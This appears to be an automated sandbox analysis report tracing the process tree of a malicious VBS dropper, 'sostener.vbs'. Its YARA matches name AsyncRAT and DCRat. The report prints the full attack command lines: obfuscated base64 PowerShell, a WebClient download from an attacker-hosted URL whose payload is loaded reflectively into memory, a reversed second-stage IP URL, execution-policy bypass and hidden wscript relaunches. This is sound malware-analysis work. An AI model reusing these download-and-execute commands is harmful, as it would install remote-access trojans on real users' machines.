                                    2024-09-26 08:57:24 UTC8089INData Raw: 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 77 51 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 71 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4d 42 4b 43 34 68 4b 47 6f 67 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 44 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4c 57 45 77 4b 58 45 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 63 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 67 44 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                    Data Ascii: wQQMTqoMBKC4hKGogBQDoLWEwKXEBcgDEMT


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:04:56:56
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                    Imagebase:0x7ff661700000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:04:56:56
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:04:56:56
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:4
                                    Start time:04:56:58
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.2534304751.00000155DC4F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000004.00000002.2534304751.00000155DC4F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:04:57:00
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:6
                                    Start time:04:57:00
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:04:57:00
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:04:57:02
                                    Start date:26/09/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    Imagebase:0x7a0000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:9
                                    Start time:04:57:03
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:04:57:13
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:04:57:13
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:04:57:15
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                                    Imagebase:0x7ff661700000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:04:57:16
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:15
                                    Start time:04:57:16
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:04:57:17
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                                    Imagebase:0x7ff661700000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:04:57:18
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:18
                                    Start time:04:57:19
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:19
                                    Start time:04:57:19
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Has exited:true

                                    Target ID:20
                                    Start time:04:57:21
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:04:57:21
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:04:57:21
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:23
                                    Start time:04:57:22
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:04:57:22
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:25
                                    Start time:04:57:23
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:26
                                    Start time:04:57:24
                                    Start date:26/09/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    Imagebase:0xe90000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000001A.00000002.2343267450.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000001A.00000002.2386589663.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Has exited:true

                                    Target ID:27
                                    Start time:04:57:27
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                                    Imagebase:0x7ff661700000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:04:57:27
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:04:57:27
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:30
                                    Start time:04:57:28
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                                    Imagebase:0x7ff661700000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:31
                                    Start time:04:57:28
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:32
                                    Start time:04:57:28
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:33
                                    Start time:04:57:30
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Has exited:true

                                    Target ID:35
                                    Start time:04:58:02
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:36
                                    Start time:04:58:02
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
